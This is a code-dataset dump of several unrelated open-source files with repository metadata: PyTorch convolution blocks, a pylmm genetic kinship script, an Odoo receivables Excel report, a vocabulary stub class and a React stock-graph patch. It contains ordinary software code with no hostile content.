Create activation layer from string/function.
"""
assert (activation is not None)
if activation == "relu":
return nn.ReLU(inplace=True)
elif activation == "relu6":
return nn.ReLU6(inplace=True)
elif activation == "sigmoid":
return nn.Sigmoid()
elif activation == "prelu":
return nn.PReLU(out_channels)
else:
raise NotImplementedError()
class ConvBlock(nn.Module):
"""
Standard convolution block with Batch normalization and activation.
"""
def __init__(self, in_channels, out_channels, kernel_size, stride, padding,
dilation=1, groups=1, bias=False, use_bn=True, bn_eps=1e-5,
activation=(lambda: nn.ReLU(inplace=True))):
super(ConvBlock, self).__init__()
self.activate = (activation is not None)
self.use_bn = use_bn
self.use_pad = (isinstance(padding, (list, tuple)) and (len(padding) == 4))
if self.use_pad:
self.pad = nn.ZeroPad2d(padding=padding)
padding = 0
self.conv = nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size,
stride=stride, padding=padding, dilation=dilation, groups=groups, bias=bias)
if self.use_bn:
self.bn = nn.BatchNorm2d(num_features=out_channels, eps=bn_eps)
if self.activate:
self.activ = get_activation_layer(activation, out_channels)
def forward(self, x):
if self.use_pad:
x = self.pad(x)
x = self.conv(x)
if self.use_bn:
x = self.bn(x)
if self.activate:
x = self.activ(x)
return x
def conv1x1_block(in_channels, out_channels, stride=1, padding=0, groups=1,
bias=False, use_bn=True, bn_eps=1e-5,
activation=(lambda: nn.ReLU(inplace=True))):
return ConvBlock(in_channels=in_channels, out_channels=out_channels, kernel_size=1, stride=stride,
padding=padding, groups=groups, bias=bias, use_bn=use_bn, bn_eps=bn_eps, activation=activation)
def conv3x3_block(in_channels, out_channels, stride=1, padding=1, dilation=1, groups=1,
bias=False, use_bn=True, bn_eps=1e-5, activation=(lambda: nn.ReLU(inplace=True))):
return ConvBlock(in_channels=in_channels, out_channels=out_channels, kernel_size=3, stride=stride,
padding=padding, dilation=dilation, groups=groups, bias=bias, use_bn=use_bn, bn_eps=bn_eps,
activation=activation)
def dwconv_block(in_channels, out_channels, kernel_size, stride=1, padding=1, dilation=1,
bias=False, use_bn=True, bn_eps=1e-5, activation=(lambda: nn.ReLU(inplace=True))):
return ConvBlock(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=out_channels, bias=bias, use_bn=use_bn, bn_eps=bn_eps, activation=activation)
def dwconv3x3_block(in_channels, out_channels, stride=1, padding=1, dilation=1,
bias=False, bn_eps=1e-5, activation=(lambda: nn.ReLU(inplace=True))):
return dwconv_block(in_channels=in_channels, out_channels=out_channels, kernel_size=3, stride=stride,
padding=padding, dilation=dilation, bias=bias, bn_eps=bn_eps, activation=activation)
def dwconv5x5_block(in_channels, out_channels, stride=1, padding=2, dilation=1,
bias=False, bn_eps=1e-5, activation=(lambda: nn.ReLU(inplace=True))):
return dwconv_block( in_channels=in_channels, out_channels=out_channels, kernel_size=5, stride=stride,
padding=padding, dilation=dilation, bias=bias, bn_eps=bn_eps, activation=activation)
class SEBlock(nn.Module):
def __init__(self, channels, reduction=16, round_mid=False, use_conv=True,
mid_activation=(lambda: nn.ReLU(inplace=True)),
out_activation=(lambda: nn.Sigmoid())):
super(SEBlock, self).__init__()
self.use_conv = use_conv
mid_channels = channels // reduction if not round_mid else round_channels(float(channels) / reduction)
self.pool = nn.AdaptiveAvgPool2d(output_size=1)
if use_conv:
self.conv1 = nn.Conv2d(in_channels=channels, out_channels=mid_channels, kernel_size=1,
stride=1, groups=1, bias=True)
else:
self.fc1 = nn.Linear(in_features=channels, out_features=mid_channels)
self.activ = nn.ReLU(inplace=True)
if use_conv:
self.conv2 = nn.Conv2d(in_channels=mid_channels, out_channels=channels, kernel_size=1,
stride=1, groups=1, bias=True)
else:
self.fc2 = nn.Linear(in_features=mid_channels, out_features=channels)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
w = self.pool(x)
if not self.use_conv:
w = w.view(x.size(0), -1)
w = self.conv1(w) if self.use_conv else self.fc1(w)
w = self.activ(w)
w = self.conv2(w) if self.use_conv else self.fc2(w)
w = self.sigmoid(w)
if not self.use_conv:
w = w.unsqueeze(2).unsqueeze(3)
x = x * w
return x
class SpatialGate(nn.Module):
def __init__(self):
super(SpatialGate, self).__init__()
self.conv = ConvBlock(in_channels=2, out_channels=1, kernel_size=7,
stride=1, padding=3, bias=False, use_bn=True, activation=None)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
att1 = x.max(dim=1)[0].unsqueeze(1)
att2 = x.mean(dim=1).unsqueeze(1)
att = torch.cat((att1, att2), dim=1)
att = self.conv(att)
att = self.sigmoid(att)
x = x * att
return x | [
"[email protected]"
] | |
69c9e262048633d25a5a72be25d5d7d6e2d42520 | d29284979657a3c05e4f8093ef1c22faf24b7897 | /scripts/pylmmKinship.py | 6ced7f73a3b236da52df218545b2581278c50c0a | [] | no_license | ChristophRau/GxTheta | 77b44488f6195c96c782e391bfbbce68a71d69fb | 1effab7382ecd5cb934ea8609a89be2654f59622 | refs/heads/master | 2022-09-22T22:51:12.211080 | 2022-09-14T14:39:28 | 2022-09-14T14:39:28 | 162,505,442 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,194 | py | #!/usr/bin/python
# pylmm is a python-based linear mixed-model solver with applications to GWAS
# Copyright (C) 2013 Nicholas A. Furlotte ([email protected])
# The program is free for academic use. Please contact Nick Furlotte
# <[email protected]> if you are interested in using the software for
# commercial purposes.
# The software must not be modified and distributed without prior
# permission of the author.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import pdb
import estimate_variance_components
from optparse import OptionParser, OptionGroup
usage = """usage: %prog [options] --[tfile | bfile] plinkFileBase outfile (--GxE --covfile covfile [--phenofile phenoFile])
"""
parser = OptionParser(usage=usage)
basicGroup = OptionGroup(parser, "Basic Options")
GxEGroup = OptionGroup(parser, "GxE Options")
# advancedGroup = OptionGroup(parser, "Advanced Options")
# basicGroup.add_option("--pfile", dest="pfile",
# help="The base for a PLINK ped file")
basicGroup.add_option("--tfile", dest="tfile",
help="The base for a PLINK tped file")
basicGroup.add_option("--bfile", dest="bfile",
help="The base for a PLINK binary ped file")
basicGroup.add_option("--SNPemma", dest="emmaFile", default=None,
help="For backwards compatibility with emma, we allow for \"EMMA\" file formats. "
"This is just a text file with individuals on the columns and snps on the rows.")
basicGroup.add_option("--NumSNPsemma", dest="numSNPs", type="int", default=0,
help="When providing the SNPemma file you need to specify how many snps are in the file")
basicGroup.add_option("-e", "--efile", dest="saveEig", help="Save eigendecomposition to this file.")
basicGroup.add_option("-n", default=1000, dest="computeSize", type="int",
help="The maximum number of SNPs to read into memory at once (default 1000). "
"This is important when there is a large number of SNPs, because memory could be an issue.")
basicGroup.add_option("-v", "--verbose",
action="store_true", dest="verbose", default=False,
help="Print extra info")
GxEGroup.add_option("--gxe", "--GxE",
action="store_true", dest="runGxE", default=False,
help="Run a gene-by-environment test instead of the gene test; "
"the environment variable should be binary and written as "
"the last column of the covariate file.")
GxEGroup.add_option("--covfile", dest="covfile", default=None,
help="The environment filename (no header)")
GxEGroup.add_option("--phenofile", dest="phenoFile", default=None,
help="Without this argument the program will look "
"for a file with .pheno that has the plinkFileBase root. "
"If you want to specify an alternative phenotype file, "
"then use this argument. This file should be in plink format. ")
parser.add_option_group(basicGroup)
parser.add_option_group(GxEGroup)
# parser.add_option_group(advancedGroup)
(options, args) = parser.parse_args()
if len(args) != 1:
parser.print_help()
sys.exit()
outFile = args[0]
import sys
import os
import numpy as np
from scipy import linalg
from pylmmGxT import input, lmm
import estimate_variance_components
if not options.tfile and not options.bfile and not options.emmaFile:
parser.error(
"You must provide at least one PLINK input file base (--tfile or --bfile)"
" or an emma formatted file (--emmaSNP).")
if options.verbose:
sys.stderr.write("Reading PLINK input...\n")
if options.runGxE:
if options.bfile:
IN = input.plink(options.bfile, type='b', phenoFile=options.phenoFile)
elif options.tfile:
IN = input.plink(options.tfile, type='t', phenoFile=options.phenoFile)
else:
parser.error(
"You must provide at least one PLINK input file base (--tfile or --bfile)"
" or an emma formatted file (--emmaSNP).")
else:
if options.bfile:
IN = input.plink(options.bfile, type='b')
elif options.tfile:
IN = input.plink(options.tfile, type='t')
# elif options.pfile: IN = input.plink(options.pfile,type='p')
elif options.emmaFile:
if not options.numSNPs:
parser.error("You must provide the number of SNPs when specifying an emma formatted file.")
IN = input.plink(options.emmaFile, type='emma')
else:
parser.error(
"You must provide at least one PLINK input file base (--tfile or --bfile)"
" or an emma formatted file (--emmaSNP).")
K_G = lmm.calculateKinshipIncremental(IN, numSNPs=options.numSNPs,
computeSize=options.computeSize, center=False, missing="MAF")
if options.runGxE:
K_G_outfile = '{}_K_G.pylmm.kin'.format(outFile)
else:
K_G_outfile = outFile
if options.verbose:
sys.stderr.write("Saving Genetic Kinship file to %s\n" % K_G_outfile)
np.savetxt(K_G_outfile, K_G)
if options.saveEig:
if options.verbose:
sys.stderr.write("Obtaining Eigendecomposition of K_G\n")
K_Gva, K_Gve = lmm.calculateEigendecomposition(K_G)
if options.verbose:
sys.stderr.write("Saving eigendecomposition to %s.[kva | kve]\n" % K_G_outfile)
np.savetxt("{}.kva".format(K_G_outfile), K_Gva)
np.savetxt("{}.kve".format(K_G_outfile), K_Gve)
if options.runGxE:
if options.verbose:
sys.stderr.write("Reading covariate file...\n")
X0 = IN.getCovariates(options.covfile)
X0 = np.array([u[0] for u in X0])
Y = IN.getPhenos(options.phenoFile)
Y = np.array([u[0] for u in Y])
print (X0)
print ('---------')
print (Y)
components_dict, K_combined = estimate_variance_components.main(Y=Y, K_G=K_G, env=X0)
K_combined_outfile = '{}_K_combined.pylmm.kin'.format(outFile)
if options.verbose:
sys.stderr.write("Saving GxE & Genetic Combined Kinship file to %s\n" % K_combined_outfile)
np.savetxt(K_combined_outfile, K_combined)
K_combined_varcomp_outfile = '{}_K_combined_varcomps.txt'.format(outFile)
with open(K_combined_varcomp_outfile, 'w') as f:
val_sum = sum(components_dict.values())
outputs, output_divs = [], []
for k in sorted(components_dict.keys()):
outputs.append('{}\t{}'.format(k, components_dict[k]))
output_divs.append('{}\t{:.3}%'.format('{}/V_p'.format(k), 100*components_dict[k]/val_sum))
outputs = ['V_p\t{}'.format(val_sum)] + outputs
output_str = '\n'.join(outputs + output_divs)
f.write(output_str)
if options.saveEig:
if options.verbose:
sys.stderr.write("Obtaining Eigendecomposition of K_combined\n")
K_combined_va, K_combined_ve = lmm.calculateEigendecomposition(K_combined)
if options.verbose:
sys.stderr.write("Saving eigendecomposition to %s.[kva | kve]\n" % K_combined_outfile)
np.savetxt("{}.kva".format(K_combined_outfile), K_combined_va)
np.savetxt("{}.kve".format(K_combined_outfile), K_combined_ve)
| [
"[email protected]"
] | |
237f1bd2dc487fe60a3de9660c545f74da8c252b | c4702d1a06640555829b367852138cc93ba4a161 | /dym_report_other_receivable/report/dym_report_xls.py | e815ff128933ca57add0dc5c6cc764a60b2f11eb | [] | no_license | Rizalimami/dym | 0ecadf9c049b22ebfebf92e4eab6eaad17dd3e26 | af1bcf7b77a3212bc8a8a0e41e6042a134587ed4 | refs/heads/master | 2020-04-08T10:56:43.605698 | 2018-11-27T06:44:08 | 2018-11-27T06:44:08 | 159,287,876 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 17,005 | py | import xlwt
from datetime import datetime
from openerp.osv import orm
from openerp.addons.report_xls.report_xls import report_xls
from openerp.addons.report_xls.utils import rowcol_to_cell, _render
from .dym_report import dym_report_other_receivable_print
from openerp.tools.translate import translate
import logging
_logger = logging.getLogger(__name__)
import string
_ir_translation_name = 'report.other.receivable'
class dym_report_other_receivable_print_xls(dym_report_other_receivable_print):
def __init__(self, cr, uid, name, context):
super(dym_report_other_receivable_print_xls, self).__init__(
cr, uid, name, context=context)
move_line_obj = self.pool.get('account.voucher')
self.context = context
wl_overview = move_line_obj._report_xls_other_receivable_fields(
cr, uid, context)
tmpl_upd_overview = move_line_obj._report_xls_arap_overview_template(
cr, uid, context)
wl_details = move_line_obj._report_xls_arap_details_fields(
cr, uid, context)
tmpl_upd_details = move_line_obj._report_xls_arap_overview_template(
cr, uid, context)
self.localcontext.update({
'datetime': datetime,
'wanted_list_overview': wl_overview,
'template_update_overview': tmpl_upd_overview,
'wanted_list_details': wl_details,
'template_update_details': tmpl_upd_details,
'_': self._,
})
def _(self, src):
lang = self.context.get('lang', 'en_US')
return translate(
self.cr, _ir_translation_name, 'report', lang, src) or src
class report_other_receivable_xls(report_xls):
def __init__(self, name, table, rml=False,
parser=False, header=True, store=False):
super(report_other_receivable_xls, self).__init__(
name, table, rml, parser, header, store)
# Cell Styles
_xs = self.xls_styles
# header
# Report Column Headers format
rh_cell_format = _xs['bold'] + _xs['fill'] + _xs['borders_all']
self.rh_cell_style = xlwt.easyxf(rh_cell_format)
self.rh_cell_style_center = xlwt.easyxf(
rh_cell_format + _xs['center'])
self.rh_cell_style_right = xlwt.easyxf(rh_cell_format + _xs['right'])
# Partner Column Headers format
fill_blue = 'pattern: pattern solid, fore_color 27;'
ph_cell_format = _xs['bold'] + _xs['fill'] + _xs['borders_all']
self.ph_cell_style = xlwt.easyxf(ph_cell_format)
self.ph_cell_style_decimal = xlwt.easyxf(
ph_cell_format + _xs['right'],
num_format_str=report_xls.decimal_format)
# Partner Column Data format
pd_cell_format = _xs['borders_all']
self.pd_cell_style = xlwt.easyxf(pd_cell_format)
self.pd_cell_style_center = xlwt.easyxf(
pd_cell_format + _xs['center'])
self.pd_cell_style_date = xlwt.easyxf(
pd_cell_format + _xs['left'],
num_format_str=report_xls.date_format)
self.pd_cell_style_decimal = xlwt.easyxf(
pd_cell_format + _xs['right'],
num_format_str=report_xls.decimal_format)
# totals
rt_cell_format = _xs['bold'] + _xs['fill'] + _xs['borders_all']
self.rt_cell_style = xlwt.easyxf(rt_cell_format)
self.rt_cell_style_right = xlwt.easyxf(rt_cell_format + _xs['right'])
self.rt_cell_style_decimal = xlwt.easyxf(
rt_cell_format + _xs['right'],
num_format_str=report_xls.decimal_format)
# XLS Template
self.col_specs_template_overview = {
'no': {
'header': [1, 5, 'text', _render("_('No')")],
'lines': [1, 0, 'number', _render("p['no']")],
'totals': [1, 5, 'text', None]},
'branch_status': {
'header': [1, 10, 'text', _render("_('Branch Status')"),None,self.rh_cell_style_center],
'lines': [1, 0, 'text', _render("p['branch_status'] or 'n/a'")],
'totals': [1, 0, 'text', None]},
'branch_id': {
'header': [1, 22, 'text', _render("_('Cabang')")],
'lines': [1, 0, 'text', _render("p['branch_id']")],
'totals': [1, 22, 'text', _render("_('Total')")]},
'number': {
'header': [1, 22, 'text', _render("_('Number')")],
'lines': [1, 0, 'text', _render("p['number']")],
'totals': [1, 22, 'text', None]},
'division': {
'header': [1, 22, 'text', _render("_('Divisi')")],
'lines': [1, 0, 'text', _render("p['division']")],
'totals': [1, 22, 'text', None]},
'partner_code': {
'header': [1, 22, 'text', _render("_('Customer')")],
'lines': [1, 0, 'text', _render("p['partner_code']")],
'totals': [1, 22, 'text', None]},
'partner_name': {
'header': [1, 22, 'text', _render("_('Nama Customer')")],
'lines': [1, 0, 'text', _render("p['partner_name']")],
'totals': [1, 22, 'text', None]},
'journal_name': {
'header': [1, 22, 'text', _render("_('Journal')")],
'lines': [1, 0, 'text', _render("p['journal_name']")],
'totals': [1, 22, 'text', None]},
'account_code': {
'header': [1, 22, 'text', _render("_('No COA')")],
'lines': [1, 0, 'text', _render("p['account_code']")],
'totals': [1, 22, 'text', None]},
'account_name': {
'header': [1, 22, 'text', _render("_('Nama COA')")],
'lines': [1, 0, 'text', _render("p['account_name']")],
'totals': [1, 22, 'text', None]},
'analytic_combination': {
'header': [1, 20, 'text', _render("_('Analytic Combination')"),None,self.rh_cell_style_center],
'lines': [1, 0, 'text', _render("p['analytic_combination'] or ''")],
'totals': [1, 0, 'text', None]},
'analytic_1': {
'header': [1, 20, 'text', _render("_('Analytic Company')"),None,self.rh_cell_style_center],
'lines': [1, 0, 'text', _render("p['analytic_1'] or ''")],
'totals': [1, 0, 'text', None]},
'analytic_2': {
'header': [1, 20, 'text', _render("_('Analytic Bisnis Unit')"),None,self.rh_cell_style_center],
'lines': [1, 0, 'text', _render("p['analytic_2'] or ''")],
'totals': [1, 0, 'text', None]},
'analytic_3': {
'header': [1, 20, 'text', _render("_('Analytic Branch')"),None,self.rh_cell_style_center],
'lines': [1, 0, 'text', _render("p['analytic_3'] or ''")],
'totals': [1, 0, 'text', None]},
'analytic_4': {
'header': [1, 20, 'text', _render("_('Analytic Cost Center')"),None,self.rh_cell_style_center],
'lines': [1, 0, 'text', _render("p['analytic_4'] or ''")],
'totals': [1, 0, 'text', None]},
'memo': {
'header': [1, 22, 'text', _render("_('Memo')")],
'lines': [1, 0, 'text', _render("p['memo']")],
'totals': [1, 0, 'text', None]},
'ref': {
'header': [1, 22, 'text', _render("_('Ref')")],
'lines': [1, 0, 'text', _render("p['ref']")],
'totals': [1, 22, 'text', None]},
'date': {
'header': [1, 22, 'text', _render("_('Tanggal')")],
'lines': [1, 0, 'text', _render("p['date']")],
'totals': [1, 22, 'text', None]},
'date_due': {
'header': [1, 22, 'text', _render("_('Tgl Jatuh Tempo')")],
'lines': [1, 0, 'text', _render("p['date_due']")],
'totals': [1, 22, 'text', None]},
'state': {
'header': [1, 22, 'text', _render("_('Status')")],
'lines': [1, 0, 'text', _render("p['state']")],
'totals': [1, 22, 'text', None]},
'total': {
'header': [1, 22, 'text', _render("_('Total')")],
'lines': [1, 0, 'number', _render("p['total']"), None, self.pd_cell_style_decimal],
'totals': [1, 22, 'number', _render("p['total']"), None, self.rt_cell_style_decimal]},
'dpp': {
'header': [1, 22, 'text', _render("_('DPP')")],
'lines': [1, 0, 'number', _render("p['dpp']"), None, self.pd_cell_style_decimal],
'totals': [1, 22, 'number', _render("p['dpp']"), None, self.rt_cell_style_decimal]},
'ppn': {
'header': [1, 22, 'text', _render("_('PPn')")],
'lines': [1, 0, 'number', _render("p['ppn']"), None, self.pd_cell_style_decimal],
'totals': [1, 22, 'number', _render("p['ppn']"), None, self.rt_cell_style_decimal]},
'pph': {
'header': [1, 22, 'text', _render("_('PPh')")],
'lines': [1, 0, 'number', _render("p['pph']"), None, self.pd_cell_style_decimal],
'totals': [1, 22, 'number', _render("p['pph']"), None, self.rt_cell_style_decimal]},
'piutang': {
'header': [1, 22, 'text', _render("_('Piutang')")],
'lines': [1, 0, 'number', _render("p['piutang']"), None, self.pd_cell_style_decimal],
'totals': [1, 22, 'number', _render("p['piutang']"), None, self.rt_cell_style_decimal]},
'residual': {
'header': [1, 22, 'text', _render("_('Residual')")],
'lines': [1, 0, 'number', _render("p['residual']"), None, self.pd_cell_style_decimal],
'totals': [1, 22, 'number', _render("p['residual']"), None, self.rt_cell_style_decimal]},
}
# XLS Template
self.col_specs_template_details = {
}
def generate_xls_report(self, _p, _xs, data, objects, wb):
wanted_list_overview = _p.wanted_list_overview
wanted_list_details = _p.wanted_list_details
self.col_specs_template_overview.update(_p.template_update_overview)
self.col_specs_template_details.update(_p.template_update_details)
_ = _p._
for r in _p.reports:
title_short = r['title_short'].replace('/', '-')
ws_o = wb.add_sheet(title_short)
for ws in [ws_o]:
ws.panes_frozen = True
ws.remove_splits = True
ws.portrait = 0 # Landscape
ws.fit_width_to_pages = 1
row_pos_o = 0
row_pos_d = 0
# set print header/footer
for ws in [ws_o]:
ws.header_str = self.xls_headers['standard']
ws.footer_str = self.xls_footers['standard']
# Title
## Company ##
cell_style = xlwt.easyxf(_xs['left'])
report_name = ' '.join(
[_p.company.name, r['title'],
_p.report_info])
c_specs_o = [
('report_name', 1, 0, 'text', report_name),
]
row_data = self.xls_row_template(c_specs_o, ['report_name'])
row_pos_o = self.xls_write_row(
ws_o, row_pos_o, row_data, row_style=cell_style)
## Text + Tgl ##
cell_style = xlwt.easyxf(_xs['xls_title'])
report_name = ' '.join(
[_('LAPORAN Other Receivable Per Tanggal'), _(str(datetime.today().date())),
_p.report_info])
c_specs_o = [
('report_name', 1, 0, 'text', report_name),
]
row_data = self.xls_row_template(c_specs_o, ['report_name'])
row_pos_o = self.xls_write_row(
ws_o, row_pos_o, row_data, row_style=cell_style)
## Tanggal Jtp Start Date & End Date ##
cell_style = xlwt.easyxf(_xs['left'])
report_name = ' '.join(
[_('Tanggal Jatuh Tempo'), _('-' if data['start_date'] == False else str(data['start_date'])), _('s/d'), _('-' if data['end_date'] == False else str(data['end_date'])),
_p.report_info])
c_specs_o = [
('report_name', 1, 0, 'text', report_name),
]
row_data = self.xls_row_template(c_specs_o, ['report_name'])
row_pos_o = self.xls_write_row(
ws_o, row_pos_o, row_data, row_style=cell_style)
## Tanggal Trx Start Date & End Date ##
cell_style = xlwt.easyxf(_xs['left'])
report_name = ' '.join(
[_('Tanggal Transaksi'), _('-' if data['trx_start_date'] == False else str(data['trx_start_date'])), _('s/d'), _('-' if data['trx_end_date'] == False else str(data['trx_end_date'])),
_p.report_info])
c_specs_o = [
('report_name', 1, 0, 'text', report_name),
]
row_data = self.xls_row_template(c_specs_o, ['report_name'])
row_pos_o = self.xls_write_row(
ws_o, row_pos_o, row_data, row_style=cell_style)
row_pos_o += 1
# Report Column Headers
c_specs_o = map(
lambda x: self.render(
x, self.col_specs_template_overview, 'header',
render_space={'_': _p._}),
wanted_list_overview)
row_data = self.xls_row_template(
c_specs_o, [x[0] for x in c_specs_o])
row_pos_o = self.xls_write_row(
ws_o, row_pos_o, row_data, row_style=self.rh_cell_style,
set_column_size=True)
ws_o.set_horz_split_pos(row_pos_o)
row_data_begin = row_pos_o
# Columns and Rows
no = 0
for p in r['id_ai']:
c_specs_o = map(
lambda x: self.render(
x, self.col_specs_template_overview, 'lines'),
wanted_list_overview)
for x in c_specs_o :
if x[0] == 'no' :
no += 1
x[4] = no
row_data = self.xls_row_template(
c_specs_o, [x[0] for x in c_specs_o])
row_pos_o = self.xls_write_row(
ws_o, row_pos_o, row_data, row_style=self.pd_cell_style)
row_data_end = row_pos_o
# Totals
ws_o.write(row_pos_o, 0, None, self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 1, 'Totals', self.ph_cell_style)
ws_o.write(row_pos_o, 2, None, self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 3, None, self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 4, None, self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 5, None, self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 6, None, self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 7, None, self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 8, None, self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 9, None, self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 10, xlwt.Formula("SUM(K"+str(row_data_begin)+":K"+str(row_data_end)+")"), self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 11, xlwt.Formula("SUM(L"+str(row_data_begin)+":L"+str(row_data_end)+")"), self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 12, xlwt.Formula("SUM(M"+str(row_data_begin)+":M"+str(row_data_end)+")"), self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 13, xlwt.Formula("SUM(N"+str(row_data_begin)+":N"+str(row_data_end)+")"), self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 14, xlwt.Formula("SUM(O"+str(row_data_begin)+":O"+str(row_data_end)+")"), self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 15, None, self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 16, None, self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 17, None, self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 18, None, self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 19, None, self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 20, None, self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 21, None, self.rt_cell_style_decimal)
ws_o.write(row_pos_o, 22, None, self.rt_cell_style_decimal)
# Footer
ws_o.write(row_pos_o + 1, 0, None)
ws_o.write(row_pos_o + 2, 0, _p.report_date + ' ' + str(self.pool.get('res.users').browse(self.cr, self.uid, self.uid).name))
report_other_receivable_xls('report.Laporan Other Receivable', 'account.voucher', parser = dym_report_other_receivable_print_xls)
| [
"[email protected]"
] | |
ba9793454b72cf6087c048cea652467469da0dc2 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_vagrant.py | 25425a414477258cae648761022543eca0a49624 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py |
#calss header
class _VAGRANT():
def __init__(self,):
self.name = "VAGRANT"
self.definitions = [u'a person who is poor and does not have a home or job: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"[email protected]"
] | |
0784645eb77e3222d6cf458d98c1cc8a5e195fda | db51fc5047cc498f48e2e5782df8092e19de9ddf | /FS2 - stock price data feed.py | 2fdd4f82232c5d96f700e61a63e8bde4d1053091 | [
"MIT"
] | permissive | arishma108/JPMorgan-Chase-Co | e88724ac4d55b9fd98e92dc62bdbb9e809bef6b3 | fffabf67aa1c4dd8e82200c31d47862bc0a4aca6 | refs/heads/master | 2021-03-20T05:55:11.369708 | 2020-12-10T20:29:32 | 2020-12-10T20:29:32 | 247,182,820 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,639 | py | From 359ec3f820b526c980de52d0396cd7093d5380cf Mon Sep 17 00:00:00 2001
From: Arishma Persadh <[email protected]>
Date: Tue, 4 July 2020 11:33:07 +0530
Subject: [PATCH] Make model solution
---
src/App.tsx | 24 ++++++++++++++++++------
src/Graph.tsx | 14 ++++++++++----
2 files changed, 28 insertions(+), 10 deletions(-)
diff --git a/src/App.tsx b/src/App.tsx
index 0728518..b83f979 100755
--- a/src/App.tsx
+++ b/src/App.tsx
@@ -8,6 +8,7 @@ import './App.css';
*/
interface IState {
data: ServerRespond[],
+ showGraph: boolean,
}
/**
@@ -22,6 +23,7 @@ class App extends Component<{}, IState> {
// data saves the server responds.
// We use this state to parse data down to the child element (Graph) as element property
data: [],
+ showGraph: false,
};
}
@@ -29,18 +31,28 @@ class App extends Component<{}, IState> {
* Render Graph react component with state.data parse as property data
*/
renderGraph() {
- return (<Graph data={this.state.data}/>)
+ if (this.state.showGraph) {
+ return (<Graph data={this.state.data}/>)
+ }
}
/**
* Get new data from server and update the state with the new data
*/
getDataFromServer() {
- DataStreamer.getData((serverResponds: ServerRespond[]) => {
- // Update the state by creating a new array of data that consists of
- // Previous data in the state and the new data from server
- this.setState({ data: [...this.state.data, ...serverResponds] });
- });
+ let x = 0;
+ const interval = setInterval(() => {
+ DataStreamer.getData((serverResponds: ServerRespond[]) => {
+ this.setState({
+ data: serverResponds,
+ showGraph: true,
+ });
+ });
+ x++;
+ if (x > 1000) {
+ clearInterval(interval);
+ }
+ }, 100);
}
/**
diff --git a/src/Graph.tsx b/src/Graph.tsx
index ec1430e..ddd4d55 100644
--- a/src/Graph.tsx
+++ b/src/Graph.tsx
@@ -14,7 +14,7 @@ interface IProps {
* Perspective library adds load to HTMLElement prototype.
* This interface acts as a wrapper for Typescript compiler.
*/
-interface PerspectiveViewerElement {
+interface PerspectiveViewerElement extends HTMLElement {
load: (table: Table) => void,
}
@@ -31,8 +31,9 @@ class Graph extends Component<IProps, {}> {
}
componentDidMount() {
+ console.log('rendering');
// Get element to attach the table from the DOM.
- const elem: PerspectiveViewerElement = document.getElementsByTagName('perspective-viewer')[0] as unknown as PerspectiveViewerElement;
+ const elem = document.getElementsByTagName('perspective-viewer')[0] as unknown as PerspectiveViewerElement;
const schema = {
stock: 'string',
@@ -40,15 +41,20 @@ class Graph extends Component<IProps, {}> {
top_bid_price: 'float',
timestamp: 'date',
};
-
- if (window.perspective && window.perspective.worker()) {
+ if (window.perspective) {
this.table = window.perspective.worker().table(schema);
}
if (this.table) {
+ console.log('change table');
// Load the `table` in the `<perspective-viewer>` DOM reference.
// Add more Perspective configurations here.
elem.load(this.table);
+ elem.setAttribute('view', 'y_line');
+ elem.setAttribute('column-pivots', '["stock"]');
+ elem.setAttribute('row-pivots', '["timestamp"]');
+ elem.setAttribute('columns', '["top_ask_price"]');
+ elem.setAttribute('aggregates', '{"stock":"distinct count","top_ask_price":"avg","top_bid_price":"avg","timestamp":"distinct count"}');
}
}
--
2.17.1
| [
"[email protected]"
] | |
